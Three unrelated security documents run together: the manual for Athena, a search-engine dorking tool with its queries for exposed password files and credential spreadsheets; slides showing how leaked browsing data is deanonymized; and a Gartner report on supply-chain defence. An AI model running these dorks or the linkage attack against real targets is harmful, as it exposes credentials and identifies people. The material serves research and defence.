box gets updated.
The default (with no configuration file loaded) settings are to use
google.com with no preset query types. This is so you can play around
and get a feel for Athena straight away.
Your first query with Athena
Using Athena is easy. Go to File-Open and open google.xml. Athena is
now set up to search using google. In the selected search engine drop
down box there will be various google sites to choose from. Stick to
the Default (Google.com). Scroll down the Query Selection list and
select "robots.txt" "Disallow:" filetype:txt. In the Refine Query box,
type site:whitehouse.gov and click on search. The query description
states that this query looks for robots.txt files that contain disallow
fields, telling the search engine where not to look. Our use of site:
whitehouse.gov restricts the search to the whitehouse.gov domain and
is a google specific extension. Figure 2 shows the results.
Figure 2: Using Athena to identify potential SQL injection
Now select Google (Pages from the UK) from the Selected Search
Engine drop-down box. This time there should be no findings. Switch
to Google (TR) and change the refine query entry to site:.tr then hit
Search.
Note: Do not click through to any of the sites shown in this tutorial. If
you really must look, use the google cache.
Open the yahoo.xml config in Athena. Athena will now use Yahoo for
searches. From the Selected Search Engine drop down box choose
Yahoo.com. Scroll down the query list, select filetype:xls username
password email and hit Search. Using the site: prefix it is possible to
restrict searches to specific tlds, domains or subdomains.
Logging with Athena
Logging with Athena is easy. Go to File-Output Log and choose a place
to save your logs. From now on any requests made with the search
button will be logged, along with the timestamp and a blank line in
case you want to write anything in there. Logs are written to until the
program is closed or the log file is changed.
Note: Only use of the search button is logged. Clicking through the
browser window or using Internet Explorer itself isn’t. If you want
something to appear in the logs, use the search button!
Hints and Tips
Using Athena is fairly easy, but here are some tips to help get the
most out of it.
NEVER click through from a search result to a site without permission.
Some of the searches could generate URLs that if accessed could
constitute unethical hacking in either your or the target host’s country.
At the very least you may well be violating the Acceptable Use Policy
of the search engine you’re using if your terms are too vague. If you’re
in any doubt that what you’re doing is legal, then don’t.
If you’re authorised, check the search engine cache as well as the
actual page. Sometimes there’s more to be found in a cached copy
than the real thing.
Only searches using the search button are logged – if you hit the next
page of search results in the browser window, it isn’t logged. That’s
why there’s a blank line after each log entry, so you can put this stuff
in along with your notes.
Learn a bit about the syntax of the search engines your using – being
able to refine queries that little bit more to specific targets can yield
significantly better results than a massive web-wide search.
Play with the XML configs, write your own search query items and
search engine prefix/postfix combinations, then send them to me at
[email protected]!
Athena’s Configuration Format
Athena uses an XML file (based on SiteDigger’s for compatibility
purposes) for its configuration. Actually it’ll read almost anything you
throw at it as long as certain tags are there; it doesn’t have to be
strictly valid XML. Athena’s configuration files have two sections –
Search Engines and Search sections. The searchEngineSignature tag
surrounds everything. The searchEngine tags are the wrappers for
Search Engine definitions. There are only 3 tags used in the
searchEngine section: searchEngineName, searchEnginePrefix and
searchEnginePostfix. These entries have to be there – the order
doesn’t matter too much. Consider the following examples:
<searchEngine>
<searchEngineName>Google (UK)</searchEngineName>
<searchEnginePrefixUrl>http://www.google.co.uk/search?q=</searchEnginePrefixUrl>
<searchEnginePostfixUrl>%26ie=UTF-8%26hl=en%26meta=</searchEnginePostfixUrl>
</searchEngine>
<searchEngine>
<searchEngineName>Google (Pages from the UK)</searchEngineName>
<searchEnginePrefixUrl>http://www.google.co.uk/search?hl=en%26ie=UTF-
8%26q=</searchEnginePrefixUrl>
<searchEnginePostfixUrl>%26btnG=Search%26meta=cr%3DcountryUK%7CcountryGB</searchEn
ginePostfixUrl>
</searchEngine>
The above is fine. As is the above without the <searchEngine> and
</searchEngine tags. However, if one searchEngineName follows
another then the second searchEngineName is the one added to the
drop down box. Hey, I told you it was bad code! Speaking of bad code,
one of the issues with using XML is that .NET’s XML reader really hates
ampersands. I’ll fix it eventually, but in the meantime you need to
search and replace all & symbols with %26 throughout your XML file,
otherwise it’ll crash spectacularly when it tries to load the XML in.
The Search section is completely compatible with Foundstone’s
SiteDigger. This uses the format below. For the sake of readability, the
tags used by Athena are shown below. If you create your own XML
files please add the rest of the tags. Even if you leave them blank
SiteDigger will still read them.
<signature>
<signatureReferenceNumber>23</signatureReferenceNumber>
<categoryref>T2</categoryref>
<category>TECHNOLOGY PROFILE</category>
<querytype>DON</querytype>
<querystring>intitle:index.of master.passwd</querystring>
<shortDescription>HTTP Access Password File</shortDescription>
<textualDescription>This query looked for a directory listing that might contain a
password file.</textualDescription>
<cveNumber>1000</cveNumber>
<cveLocation>http://www.1000.com</cveLocation>
</signature>
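For reference, a complete minimal configuration nests both sections inside the searchEngineSignature wrapper; the skeleton below is illustrative (placeholder values, not one of the shipped configs):

<searchEngineSignature>
<searchEngine>
<searchEngineName>Example Engine</searchEngineName>
<searchEnginePrefixUrl>http://www.example.com/search?q=</searchEnginePrefixUrl>
<searchEnginePostfixUrl>%26hl=en</searchEnginePostfixUrl>
</searchEngine>
<signature>
<signatureReferenceNumber>1</signatureReferenceNumber>
<categoryref>T1</categoryref>
<category>EXAMPLE</category>
<querytype>DON</querytype>
<querystring>intitle:example</querystring>
<shortDescription>Example query</shortDescription>
<textualDescription>An example query entry.</textualDescription>
<cveNumber>1000</cveNumber>
<cveLocation>http://www.1000.com</cveLocation>
</signature>
</searchEngineSignature>

Remember the ampersand caveat above: any & in the URLs must be written as %26 or the loader will choke.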
ChangeLog
13/06/04 – Athena 1.0 released. Fixed the following bugs:
Crash when Query List box is selected after loading a fresh config
without selecting a search engine from the drop down box first.
Logging prints extra newline for each entry
Got multiple search engine support working (Almost) completely
properly
05/06/04 – Athena 0.6. Fixed bugs:
Lotsa crashes fixed. Removed Search engine title and replaced with
drop-down list… which doesn’t work too well.
Removed GoogleHack references, got Prefix working, but not
implemented Postfix yet.
01/06/04 – Athena 0.5.
Multiple Search engines sorted, but one config file needed for
Google.com, another for .co.uk, another for .com.tr etc. Works with
Yahoo! Put some exception catching in, along with a large number of
Duct tape grade kludges.
28/05/04 – Athena 0.1b
Exceptions? We don’t need no stinking exceptions! Lots of crashes.
OFD cancel causes all containers to clear! Ampersand bug in XML
reader.
23/05/04 – GoogleHack 0.2 (Athena 0.1)
Basic browser window, query list box for searches. Queries are hard
coded into the program – need a config file.
20/04/04 – GoogleHack 0.1
Uses babelfish and google translator to search google. Proof of
concept.
Todo
Code cleanup
More search engine configs (send me yours!)
Implement SiteDigger XML category drop-box to make query fragment
finding quicker – but not sure if this is a good idea. | pdf |
Dark Data
Svea Eckert – Andreas Dewes
Who we are
Svea Eckert
Journalist (NDR/ ARD)
@sveckert
@japh44
Andreas Dewes
Data Scientist (DCSO & 7scientists)
Why we are here
“US Senate voted to eliminate broadband privacy rules
that would have required ISPs to get consumers' explicit
consent before selling or sharing Web browsing data (...)“
3/23/2017
https://arstechnica.com
What does that mean
You can see
everything
–
S*#t!
ARD, Panorama, 03.11.2016
ARD, Panorama, 03.11.2016
I don‘t know, why I
was searching for
“Tebonin” at that
time.
This is really bad to
see something like
this – especially if it is
connected with my
own name.
Employee of Helge Braun, CDU – Assistant Secretary of the German Chancellor
How we did it – the “hacking” part
Social engineering
Social engineering
What did we get?
Our data set
3.000.000.000 URLs (insufficiently anonymized)
9.000.000 Domains
3.000.000 Users
https://www.google.com/?q=xxxx... [user id] [timestamp] …
30 days of data per user
Statistical Deanonymization
https://www.cs.cornell.edu/~shmat/shmat_oak08netflix.pdf
How does it work?
...
anonymized user data
public / external personal data
User 1
User 2
User N
Identifier
(e.g. name)
e.g. „user 1 visited domain X“
Let‘s try this!
...
...
...
...
...
Domains
Users
=> sparsely populated matrix with 9.000.000 x 1.000.000 entries
Our Algorithm
▪ Generate user/domain matrix M
▪ Generate vector v with information
about visited domains
▪ Multiply M·v
▪ Look for best match
M = (...)
w = M·v
i = argmax (w)
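In code the matching step is a single sparse matrix-vector product; a minimal sketch with assumed names (not the talk's own implementation):

import numpy as np
from scipy.sparse import csr_matrix

# M: sparse binary users-by-domains matrix built from the clickstream data
# v: binary vector with a 1 for every domain seen in the public profile
def best_match(M: csr_matrix, v: np.ndarray) -> int:
    w = M.dot(v)              # per-user count of overlapping domains
    return int(np.argmax(w))  # index of the user with the largest overlap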
How well does this work?
(figure: the per-domain user counts 15.561, 1.114.408, 367 and 11 for www.gog.com, kundencenter.telekom.de, banking.sparda.de and handelsblatt.com intersect down to exactly 1 user)
But how can public information be extracted?
Two examples
Twitter
• We use the Twitter API to
download tweets from the
relevant time period (one
month)
• We extract URLs from the
tweets and generate the
associated domain by
following the links
• We feed the domain
information into our algorithm
(figure: number of matching domains per user, users arbitrarily sorted)
Visited
Websites
github.com (2.584.681)
www.change.org (124.152)
fxexperience.com (394)
community.oracle.com (5161)
paper.li (2689)
javarevisited.blogspot.de (525)
www.adam-bien.com (365)
rterp.wordpress.com (129)
Gotcha!
Examples
Seemingly harmless identifiers can betray you
https://www.youtube.com/watch?v=DLzxrzFCyOs
Youtube
▪ We download public playlists
from users (often linked via
Google+)
▪ We extract the video IDs using
the Youtube API
▪ We feed the resulting video
Ids into our algorithm (this
time initialized with video IDs
instead of domains)
(figure: number of matching videos in profile per user, users arbitrarily sorted)
02Zm-Ayv-PA
18rBn4heThI
2ips2mM7Zqw
2wUvlTUi8kQ
34Na4j8AVgA
3VVuMIB2hC0
4fXvJHrbUTA
4ulaGjwiIbo
5BzkbSq7pww
5RDSkR8_AQ0
680R1Gq2YYU
6IHq9yv_qis
8d5QEWdHchk
...
Gotcha!
Example
Video-IDs:
More ways to
extract public
information
▪ Google Maps URLs
(contain
latitude/longitude)
▪ Facebook Post IDs
(URLs were
anonymized in the
data set but IDs
were shared)
▪ …
"Instant" deanonymization via a unique URL
What did we find in the data?
Ladies and Gentlemen, because of an investigation concerning computer fraud
(file number), which I have dealt with here, § 113 TKG i.V.m. § 100j StPO I need
information on following IP address: xxx.xxx.xxx.xxx Time stamp: xx.xx.2016,
10:05:31 CEST
The data is needed to identify the offender. Please send your answer by e-mail
to the following address
[email protected] or by fax.
first name
Last Name
Detective Chief Place of county
Cybercrime
phone number
Where do I find tilde on my keyboard
What is IP 127.0.0.1
One last example
Who collected the data?
Browser Plugins
Test in virtual machine
Test
Uninstalled Ad-Ons
Suspected WOT (Web of Trust)
[DATE] 11:15:04 http://what.kuketz.de/
[...]
[DATE] 15:49:27 https://www.ebay-kleinanzeigen.de/p-anzeige-bearbeiten.html?adId=xxx
[DATE] 13:06:23 http://what.kuketz.de/
[...]
[DATE] 11:22:18 http://what.kuketz.de/
[DATE] 14:59:30 http://blog.fefe.de/
[...]
[DATE] 14:59:36 http://what.kuketz.de/
[DATE] 14:59:44 https://www.mywot.com/en/scorecard/what.kuketz.de?utm_source=addon&utm_content=rw-viewsc
[...]
[DATE] 13:48:24 http://what.kuketz.de/
[...]
test by Mike Kuketz / www.kuketz-blog.de
How many extensions are affected?
95% of the data comes from only 10 extensions (variants/versions).
Many more are spying on their users, but have a small installation base.
Up to 10.000 extension versions affected (upper-bound analysis via extension ID).
[Figure: number of data points per extension vs. rank of extension]
Why use extensions for tracking?
[Diagram: tracking server]
(How) can I protect myself against tracking?
• Rotating proxy servers (n >> 1), e.g. Tor or a VPN with rotating exit nodes
• Client-side blocking of trackers
Can I hide in my data by generating noise (e.g. via random page visits)?
Usually not ¯\_(ツ)_/¯
argmax(M·v) is robust against isolated (additive) perturbation (numeric check below)
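A quick numeric check of that robustness claim (toy sizes and the 200-visit noise level are my assumptions):

import numpy as np
rng = np.random.default_rng(0)

M = (rng.random((1000, 5000)) < 0.01).astype(np.int8)  # toy visit matrix
target = 42
known = np.flatnonzero(M[target])[:10]                 # 10 known domains
v = np.zeros(5000, dtype=np.int8)
v[known] = 1

noisy = M.copy()
noisy[target, rng.integers(0, 5000, 200)] = 1          # 200 random "cover" visits

# Adding visits cannot remove matches, so the best match stays the target
print(np.argmax(M @ v), np.argmax(noisy @ v))          # expected: 42 42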
Takeaways
Often, only a few external data points (<10) are sufficient to uniquely identify a person.
The increase in publicly available information on many people makes de-anonymization via linkage attacks easier than ever before.
High-dimensional, user-related data is really hard to robustly anonymize (even if you really try to do so).
Special thanks to
Kian Badrnejad, NDR
Jasmin Klofta, NDR
Jan Lukas Strozyk, NDR
Martin Fuchs @wahlbeobachter
Stefanie Helbig
Mike Kuketz, kuketz-blog.de
Many further sources and contributors
TV shows ARD Panorama, NDR Panorama3 and ZAPP
http://daserste.ndr.de/panorama/aktuell/Web-Strip-Intimate-data-from-federal-politicians-for-sale,nacktimnetz114.html
Questions?
Svea Eckert
Journalist NDR/ ARD
@sveckert
@japh44
[email protected]
[email protected]
Andreas Dewes
Data Scientist | pdf |
Licensed for Distribution
How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks
Published 15 July 2021 - ID G00752454 - 19 min read
By Manjunath Bhat, Dale Gardner, and 1 more
Attackers are targeting software development systems, open-source artifacts and DevOps pipelines to compromise software supply chains. Software engineering leaders must guide their teams to protect the integrity of the software delivery process by adopting practices described in this research.
Overview
Key Findings
■ The increased threat of malicious code injection makes it critical to protect internal code and external dependencies (both open-source and commercial).
■ Leaked secrets or other sensitive data and code tampering prior to release are consequences of a compromised software build and delivery pipeline.
■ Failure to enforce least privilege entitlements and flat network architectures enables attackers to move laterally against the operating environment, putting the enterprise at greater risk.
Recommendations
Software engineering leaders focused on software engineering strategies should work with their security and risk counterparts to:
■ Protect the integrity of internal and external code by enforcing strong version-control policies, using artifact repositories for trusted content, and managing vendor risk throughout the delivery life cycle.
■ Harden the software delivery pipeline by configuring security controls in CI/CD tools, securing secrets and signing code and container images.
■ Secure the operating environment for software engineers by governing access to resources using principles of least privilege and a zero-trust security model.
Strategic Planning Assumption
By 2025, 45% of organizations worldwide will have experienced attacks on their software supply
chains, a three-fold increase from 2021.
Introduction
Software engineering leaders are at the forefront of digital business innovation. They are
responsible not only for software development and delivery, but are also increasingly accountable
for implementing security practices. These practices have traditionally focused on activities such
as scanning code for potential security vulnerabilities and patching software systems.
However, software supply chain attacks are becoming increasingly sophisticated, with malicious
actors exploiting weaknesses at every stage in the software procurement, development and
delivery life cycle. This includes everything from injecting malicious code into open-source
packages to installing back doors in postdeployment software updates.
As a result, software engineering teams must assume that all code (both externally sourced and
internally developed), development environments and tooling may have been compromised. In
addition, security hygiene should now extend to external code dependencies and commercial off-the-shelf (COTS) software, which includes the use of third-party APIs.
This research explains how software engineering leaders can counter the threat of software
supply chain attacks. See Figure 1 for secure development practices to guard against software
supply chain attacks. Figure 2 highlights the potential security risks at each stage of the delivery
process.
Figure 1: Top Practices to Mitigate Supply Chain Security Risks in
Software Development and Delivery
A software supply chain attack is the act of compromising software or one of its dependencies at
any stage throughout its development, delivery and usage. Although the precise attack vector may
vary in each case, the attacker usually gains unauthorized access to development environments and
infrastructure including version control systems, artifact registries, open-source repositories,
continuous integration pipelines, build servers or application servers. This allows the attacker to
modify source code, scripts and packages, and establish back doors to steal data from the victim’s
environment. Attacks are not limited to external actors; they can come from insider threats as well.
The attacks on SolarWinds (2020), NetBeans IDE (2020), Kaseya (2021) and Codecov (2021)
represent four prominent examples of software supply chain attacks (see the Evidence section and
Notes 1 through 5). Gartner believes that by 2025, 45% of organizations worldwide will have
experienced attacks on their software supply chains, a three-fold increase from 2021.
This research will address the following security concerns Gartner encounters in client inquiries:
■ Compromise of continuous integration/continuous delivery (CI/CD) systems
■ Injection of malware into legitimate software
■ Inclusion of vulnerable and malicious dependencies
Figure 2: Potential Software Supply Chain Security Risks
Analysis
Protect the Integrity of Internal and External Source Code
Software engineering teams use version control systems (VCSs) and artifact repositories to
maintain internally developed code and external artifacts. Failing to enforce security controls in
these tools exposes source code and artifacts to potential manipulation and tampering.
We recommend three practices that protect the integrity of internal and external code:
1. Strong version control policies
2. Trusted component registries
3. Third-party risk management
Strong Version Control Policies
Git-based VCSs including BitBucket, GitHub and GitLab provide native security and access
protection capabilities. Software engineering teams must leverage access policy controls, branch
protection and secrets scanning capabilities. These controls are not enabled by default and must
be explicitly set. See Figure 3.
Figure 3: Strong Version Control Policies
Secrets and credentials should never be stored in source code repositories, but software
engineers can accidentally commit secrets to source control. Since any user who has access to
the repository can clone the repository and store it anywhere, the cloned repository becomes a
treasure trove for attackers looking to steal credentials, API keys or secrets. We recommend
continuous scanning of repositories to check for files embedded with secrets using either open-
source tools or provider-native capabilities (see Table 1).
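As a toy illustration of what these scanners look for (a real deployment would use one of the tools in Table 1; the patterns below are simplified and far from exhaustive):

import re, sys, pathlib

# Simplified credential patterns (illustrative only)
PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key":       re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "generic_secret":    re.compile(r"(?i)(?:api[_-]?key|secret|token)\s*[:=]\s*['\"][^'\"]{16,}['\"]"),
}

def scan(root):
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for name, pattern in PATTERNS.items():
            if pattern.search(text):
                print(f"{path}: possible {name}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")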
Table 1: Representative List of Secrets Scanning Tools for Git Repositories
Open-source tools: git-secrets (open sourced by AWS Labs); Repo Supervisor (open sourced by Auth0); truffleHog (searches for secrets in Git repos); Gitleaks (scans repos and commits for secrets); Deadshot (open sourced by Twilio)
Vendors: GitHub Secrets Scanning; GitLab Secret Detection; Bitbucket Secrets Scan; GitGuardian; SpectralOps
Source: Gartner
Trusted Component Registries
As software is increasingly assembled using open-source components, third-party packages and
public APIs, the threat of supply chain attacks due to malicious code looms large (see Note 5 for
examples of package typosquatting attacks in popular open-source libraries). We recommend the
use of artifact (and container) repositories, software composition analysis tools and code
scanning tools.
Artifact Repositories
Artifact repositories enable securing, versioning and safely distributing software packages — both
internally built and externally sourced. The repositories act as a trusted source for sanctioned and
vetted artifacts and software components. This enables centralized governance, visibility,
auditability and traceability into software “ingredients.”
Since the repositories can act as proxies to external public registries, it has the added benefit of
keeping the packages continuously updated and patched. One of the defense agencies uses a
centralized artifact repository (“Iron Bank” 1) that stores signed container images for both OSS
and COTS. See Note 2 for open-source container signing tools.
Examples of artifact repositories:
■ Azure Artifacts
■ AWS CodeArtifact
■ GitHub
■ GitLab
■ Google Artifact Registry
■ JFrog Artifactory
■ Sonatype Nexus Repository
■ Tidelift Catalogs
Examples of container registries:
■ Amazon ECR
■ Azure Container Registry
■ CNCF Harbor
■ Docker Trusted Registry
■ GitHub
■ GitLab
■ Google Container Registry
■ JFrog Artifactory
■ Red Hat Quay
Software Composition Analysis (SCA)
SCA complements artifact and container registries by analyzing stored artifacts or container
images to uncover known vulnerabilities. Without SCA, it is difficult to manage dependencies at
scale and to identify known vulnerabilities in published components. Gartner recommends pairing
artifact repositories with integrated SCA and open-source governance capabilities. Examples
include Sonatype Nexus Repository with IQ Server or JFrog Artifactory with Xray (see Market
Guide for Software Composition Analysis).
Code Scanning
Although SCA uncovers known vulnerabilities (often CVE IDs) in published software packages, it
will not help with detecting potentially exploitable flaws that exist in custom application code. We
recommend using application security testing tools for static (SAST), dynamic (DAST) and fuzz
testing of application code. Some AST tools offer SCA capabilities (see Magic Quadrant for
Application Security Testing).
Third-Party Risk Management
Software engineering teams not only build their own software but also consume software
developed by other organizations (including vendors, partners and service providers). This section
will focus on assessing and managing the two kinds of supply chain risks typically associated
with third-party software:
Gartner recommends the following practices to mitigate these risks:
■ Risks due to known vulnerabilities in third-party or open-source dependencies (for example, Equifax, SaltStack). 3,4
■ Risks due to back doors/malware implanted in externally procured software (for example, SolarWinds attacks). 5
Check for adherence to standards and certifications: Require software suppliers to be certified
against relevant security standards such as UL 2900 for IoT certification and ISO/IEC 27034 to
ensure adherence to consistent and formalized application security practices. This may include
requiring a specified level of developer testing and evaluation. For example, static and dynamic
code analysis, threat modeling and vulnerability analysis, third-party verification of processes,
manual code review and penetration testing.
See Note 6 for frameworks and standards that help evaluate your provider/partner’s supply chain
security posture.
Audit the provider's software build, deployment and upgrade process: Ask these questions to benchmark software providers against a minimal baseline:
■ Does the provider have the necessary controls to secure their SDLC process? (See 12 Things to Get Right for Successful DevSecOps.)
■ What process does the provider follow to patch its own software and its dependencies? Request a software bill of materials that helps track nested dependencies. See Note 3 for tracking open-source dependency chains and assessing the security posture of open-source projects (upstream).
■ Is the mechanism to deliver the patch protected from external attacks?
■ What is the SLA for patching a vulnerability discovered in the vendor's software or its dependencies?
In software, the chain isn't as strong as its weakest link; it's as weak as all the weak links multiplied together.
— Steve McConnell
Harden the Software Development and Delivery Pipeline
Gartner recommends three practices to strengthen the security of the software delivery pipelines:
■ Implement secrets management
■ Implement signing and hashing to verify integrity of source code
■ Configure security controls in CI/CD pipelines
Implement Secrets Management
Hard-coding secrets in code and configuration files significantly increases the risk of
compromising build pipelines and development environments. In addition, storing any type of
secret in a container image can expose that data inadvertently, particularly if images are stored in
public registries. Software engineering teams must continuously check committed code and
artifacts for embedded secrets.
Secrets management provides a disciplined approach to managing and securing secrets such as
credentials, passwords, API tokens and certificates. We recommend the use of secrets
management tools to automate creation, storage, retrieval and revocation of secrets. This helps
avoid embedding (hard-coding) secrets in source code, configuration files and infrastructure
automation scripts. See Table 2 for representative providers of secrets management tools for
multiple development scenarios.
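For instance, with HashiCorp Vault's KV v2 engine an application can fetch credentials at runtime instead of hard-coding them (a sketch using the hvac client; the secret path and environment variables are my assumptions):

import os
import hvac  # HashiCorp Vault API client

# The Vault address and token come from the environment, never from source control
client = hvac.Client(url=os.environ["VAULT_ADDR"], token=os.environ["VAULT_TOKEN"])

# Read a secret stored at secret/data/ci/registry (KV v2 engine)
resp = client.secrets.kv.v2.read_secret_version(path="ci/registry")
registry_password = resp["data"]["data"]["password"]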
Table 2: Secrets Management Tools
Platform-agnostic tools: Akeyless, CyberArk Conjur, Thycotic Secrets Vault, HashiCorp Vault
Cloud-provider tools: AWS Secrets Manager, Azure Key Vault, GCP Secret Manager
Container-native environments: Kubernetes Secrets (etcd), Sealed Secrets
Configuration management: Ansible Vault, Chef Data Bag, Puppet Hiera
Source: Gartner
Secrets such as credential files, private keys, passwords and API tokens
should not be committed to a source control repository. Use a secrets
management tool to securely store and encrypt secrets, enforce access
controls and manage secrets (that is, create, rotate and revoke).
Implement Signing and Hashing to Verify Integrity of Source Code
Hashing and signing can be used to verify integrity of source code and binaries. VCSs generate
hashes (unique identifiers) for individual files during commits. These hashes help validate that the
files are not altered in transit. Likewise, compilers generate hashes as well. Compiler-generated
hashes (during CI/CD) can be compared with file hashes generated by static file analyzers (during
scanning). This ensures that the code being shipped is the same as the code that was scanned.
See Note 7 for hashing and code signing tools.
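A minimal sketch of hash-based integrity checking (the compare-at-scan-time workflow above would feed expected_sha256 from the CI system; the function names are mine):

import hashlib

def sha256_of(path, chunk_size=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(path, expected_sha256):
    actual = sha256_of(path)
    if actual != expected_sha256:
        raise ValueError(f"{path}: hash mismatch ({actual} != {expected_sha256})")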
Commit Signing
Hashing does not address the needs of provenance and authenticity, which is why we recommend
signing. VCSs support signed commits to provide others the assurance that the files originated
from a trusted source. As examples, GitHub and GitLab attach a “verified” label against signed
commits when the signature can be verified for valid users. Think of this like Twitter verified
accounts — where Twitter confirms the account holder’s identity.
Container Signing
As organizations move to container-based deployments and source containers from different
locations, ensuring the integrity of container images becomes paramount. Gartner recommends
signing container images even if your organization builds and maintains internal images. This is
because any issue in third-party code or dependencies impacts the security posture of your
running applications (see Figure 4). See Note 2 for open-source container signing tools.
Figure 4: Propagation of Container Image Vulnerabilities in
Kubernetes
Configure Security Controls in CI/CD Pipelines
CI/CD systems, if left unsecured, introduce security risks in the software delivery pipeline. For
example, attackers can manipulate build pipeline definitions to suppress checks, allowing
malicious code to pass through or redirect releases to a malicious delivery target. CI/CD pipelines
must be configured with elevated security and access controls, as these may be turned off by
default.
Attackers are increasingly targeting build pipelines as an attack vector. Therefore, software
engineering leaders must implement security tools to protect code integrity and prevent code
tampering in the build pipeline. Representative providers of these tools include Apiiro, Argon,
Cycode, Garantir, GrammaTech, JFrog (Vdoo) and RunSafe Security.
Software engineering teams must adopt these practices to protect their CI/CD pipelines:
■ Reproducible build practices to ensure that a given source code always results in the same build output. See Note 4 for details on the "reproducible-builds" project and tools.
■ Signed Pipelines that create immutable, verifiable artifacts. For example, JFrog Signed Pipelines and Tekton Chains enable signing artifacts generated during a pipeline run to ensure immutability and verify provenance at the end of the pipeline execution.
Compromised IDEs resulting in trojanized builds present the most serious supply chain security risk
in software delivery. Examples include XcodeGhost malware (Xcode IDE in 2015), Octopus Scanner
(NetBeans IDE in 2020), vulnerable VS Code extensions and Node.js Debugger.
Browser-based IDEs eliminate the risk of compromising locally installed IDEs on developer
machines. Browser-based IDEs either enable web access to a remote development environment or
sandbox the IDE within the browser security context. This decouples the development workspace
from the physical workstation which may not be adequately protected. Examples of browser-based
IDEs include Codeanywhere, GitHub Codespaces, Gitpod, Replit and StackBlitz.
Secure the Operating Environment for Developers
Software development environments span multiple distributed systems, platforms and tools,
communicating with each other in the software delivery life cycle using privileged service
accounts. For example, build machines communicate with source code repositories to pull source
code and artifact repositories to pull common packages, and connect to deployment targets to
deploy binaries. The risk is that the tools and services default to running with elevated system
privileges without privilege access controls in place.
Least Privilege Access Policies and Methods
The ability to connect to different machines on a network and elevated system privileges allows
attackers to infiltrate other machines and services once they gain access to one system. In
addition, a compromised executable can establish unauthorized connections to other critical
systems unless the right access controls are put in place. Therefore, we recommend the use of
role-based authentication and authorization, adaptive access using zero-trust security model and
privilege access management (see Figure 5).
Figure 5: Methods to Govern User Access and Privileged Accounts
Zero-Trust Network Access (ZTNA) provides controlled identity- and context-aware access to
development resources, reducing the surface area for supply chain attacks. It eliminates excessive
implicit trust placed on machines and services simply because they share the same network,
replacing it with explicit identity-based trust (see Market Guide for Zero Trust Network Access).
We recommend privileged access management (PAM) tools to monitor and protect privileged
service accounts that run builds and automation jobs. In the SolarWinds attack, attackers
modified trusted domains and abused privileged roles (see Note 1). We see that as a confirmation
that privileged accounts are a primary target. Mitigating this risk often requires privileged
accounts to be managed by a PAM (see Top 10 Lessons Learned From the SolarWinds Attack).
PAM tools help vault privileged passwords, limit access to authorized users, rotate credentials
frequently and monitor the usage of privileged accounts. Vendors such as Akeyless (Zero Trust
Access), Britive and HashiCorp (Boundary) combine dynamic secrets, authentication,
authorization and just-in-time credentials to enforce least privilege access to services and
resources.
Machine Identity Management
Distributed application architectures, cloud-native infrastructure and APIs-as-products have
increased the granularity and volume of machine identities. Hosts, containers, VMs, applications,
database servers, services and API endpoints all use distinct machine identities. Machine
identities enable the services and endpoints to uniquely authenticate themselves while interacting
with other services.
The scale and speed at which machine identities are used to authenticate
and access services throughout the software supply chain makes machine
identity management now an imperative.
Examples of machine identities include server credentials such as TLS certificates and SSH host
keys, and client credentials such as OAuth credentials, API tokens and database connection
strings. Machine identity management (MIM) is the discipline of managing the life cycle and
access to these identities. MIM is not a single tool or market. It is a collection of practices and
tools that enhances trust and integrity of machine-to-machine interactions, which is critical to
securing development environments (see Table 3).
Table 3: Tools and Providers for Machine Identity Management
Domain: Key management systems
Use Case: Encryption of data at rest, management of symmetric keys
Sample Providers: Akeyless, AWS KMS, Azure, Twilio (Ionic), Fortanix, PKWARE, Thales and Townsend Security
Domain: Secrets management
Use Case: Storing secrets used in the DevOps pipeline, issuance of machine identities to containers
Sample Providers: Akeyless, AWS, Microsoft Azure, BeyondTrust, CyberArk, Fortanix, Google Cloud Platform (GCP), HashiCorp, ThycoticCentrify
Domain: PKI and certificate management
Use Case: Authentication, encryption and signatures for code signing
Sample Providers: AppViewX, AWS, DigiCert, Entrust, GlobalSign, Keyfactor, Microsoft, The Nexus Group, Sectigo, Venafi
Domain: Privileged access management
Use Case: Discovering and controlling privileged access to critical systems
Sample Providers: Akeyless, BeyondTrust, Broadcom, CyberArk, One Identity, ThycoticCentrify
Source: Gartner
Anomaly Detection and Automated Response
One of the lessons from the SolarWinds attack is that software engineering teams are ill-equipped
to detect and respond to anomalies before damage is done. Malicious attacks on software
development pipelines have a high likelihood of surfacing as an anomalous activity.
Examples of such anomalous activity include:
■ Executables establishing seemingly strange and unnecessary connections with their "command and control" centers.
■ Increases in the number of processes or threads, CPU and memory utilization on select machines.
■ Spikes in network access, repository uploads/downloads and unexpected directory access traffic.
Monitor for cloning of source code repositories using logging or other monitoring tools, such as an EPP or SIEM. CASBs can also be useful in cases of SaaS-based version control systems.
Software engineering leaders must work closely with security and risk teams to understand and
define the expected behavior of their development platforms and tools so they can detect
anomalies in real time. For example, EDR, CWPP, NDR or tools such as osquery can monitor for
system anomalies. Build systems, including PCs used by software engineers, should not be
exempt from EPP/EDR protection for this reason.
Anomaly detection and response is especially critical in container-native, GitOps-based
deployments that automate the full code-to-container workflow. Although container image
scanning tools in the development phase help detect known vulnerabilities, software engineering
teams must deploy tools to visualize container traffic, identify cluster misconfigurations and alert
on anomalous container behavior and security events.
See Market Guide for Cloud Workload Protection Platforms for container and Kubernetes-focused
tools.
Evidence
1 Iron Bank
2 2020 State of the Software Supply Chain Report, Sonatype
3 Equifax Data Breach, Epic.org
4 SaltStack Authorization Bypass, F-Secure Labs
5 SolarWinds Security Advisory, SolarWinds
Note 1: Examples of Software Supply Chain Security Attacks
SolarWinds — Roughly 18,000 customers of SolarWinds downloaded trojanized versions of its
Orion IT monitoring and management software. The supply chain attack led to the breach of
government and high-profile companies after attackers deployed a backdoor dubbed SUNBURST
or Solorigate.
Octopus Scanner Malware — Octopus Scanner, an OSS supply chain malware, targets the NetBeans IDE, injecting backdoor code into resulting JAR files built with the IDE.
Codecov — U.S. cybersecurity firm Rapid7 had also revealed that some of their source code
repositories and credentials were accessed by Codecov attackers.
Note 2: Open-Source Projects for Container Signing and Admission Tools
Grafeas defines an API spec for managing metadata about software resources, such as
container images, VM images, JAR files, and scripts. It provides a centralized knowledge base for
